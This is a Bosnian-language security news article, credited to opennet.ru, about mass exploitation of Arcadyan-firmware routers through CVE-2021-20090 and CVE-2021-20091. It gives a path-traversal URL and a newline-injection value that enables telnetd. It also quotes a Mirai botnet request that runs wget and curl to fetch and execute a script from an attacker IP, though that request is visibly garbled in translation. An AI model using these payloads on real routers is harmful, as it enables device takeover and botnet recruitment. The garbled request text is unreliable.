Na mreži je zabilježen masovni napad na kućne rutere čiji firmver koristi implementaciju HTTP servera kompanije Arcadyan. Da bi se dobila kontrola nad uređajima, koristi se kombinacija dvije ranjivosti koja omogućava daljinsko izvršavanje proizvoljnog koda s root pravima. Problem pogađa prilično širok spektar ADSL rutera kompanija Arcadyan, ASUS i Buffalo, kao i uređaje koji se isporučuju pod brendovima Beeline (problem je potvrđen u Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone i ostali telekom operateri. Napominje se da je problem prisutan u Arcadyan firmveru više od 10 godina i da je za to vrijeme uspio da migrira na najmanje 20 modela uređaja od 17 različitih proizvođača.
Prva ranjivost, CVE-2021-20090, omogućava pristup bilo kojoj skripti web interfejsa bez autentifikacije. Suština ranjivosti je da su u web interfejsu neki direktoriji kroz koje se šalju slike, CSS datoteke i JavaScript skripte dostupni bez autentifikacije. U ovom slučaju, direktoriji za koje je dozvoljen pristup bez provjere autentičnosti provjeravaju se korištenjem početne maske. Navođenje znakova “../” u putanjama za odlazak u roditeljski direktorij blokira firmver, ali se preskače korištenje kombinacije “..%2f”. Tako je moguće otvoriti zaštićene stranice prilikom slanja zahtjeva poput “http://192.168.1.1/images/..%2findex.htm”.
Druga ranjivost, CVE-2021-20091, omogućava autentificiranom korisniku da izvrši promjene u sistemskim postavkama uređaja slanjem posebno formatiranih parametara skripti apply_abstract.cgi, koja ne provjerava prisustvo znaka novog reda u parametrima . Na primjer, prilikom izvođenja ping operacije, napadač može navesti vrijednost “192.168.1.2%0AARC_SYS_TelnetdEnable=1” u polju sa IP adresom koja se provjerava i skriptom, prilikom kreiranja datoteke postavki /tmp/etc/config/ .glbcfg, upisaće red “AARC_SYS_TelnetdEnable=1” u njega ", koji aktivira telnetd server, koji obezbeđuje neograničen pristup komandnoj ljusci sa root pravima. Slično, postavljanjem parametra AARC_SYS, možete izvršiti bilo koji kod na sistemu. Prva ranjivost omogućava pokretanje problematične skripte bez autentifikacije pristupajući joj kao “/images/..%2fapply_abstract.cgi”.
Da bi iskoristio ranjivosti, napadač mora biti u mogućnosti da pošalje zahtjev mrežnom portu na kojem je pokrenut web interfejs. Sudeći po dinamici širenja napada, mnogi operateri ostavljaju pristup svojim uređajima sa vanjske mreže kako bi službi podrške pojednostavili dijagnosticiranje problema. Ako je pristup interfejsu ograničen samo na internu mrežu, napad se može izvesti sa eksterne mreže korišćenjem tehnike „DNS ponovnog povezivanja“. Ranjivosti se već aktivno koriste za povezivanje rutera sa Mirai botnetom: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Veza: zatvori User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5_i.212.192.241.7dress_ping 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
izvor: opennet.ru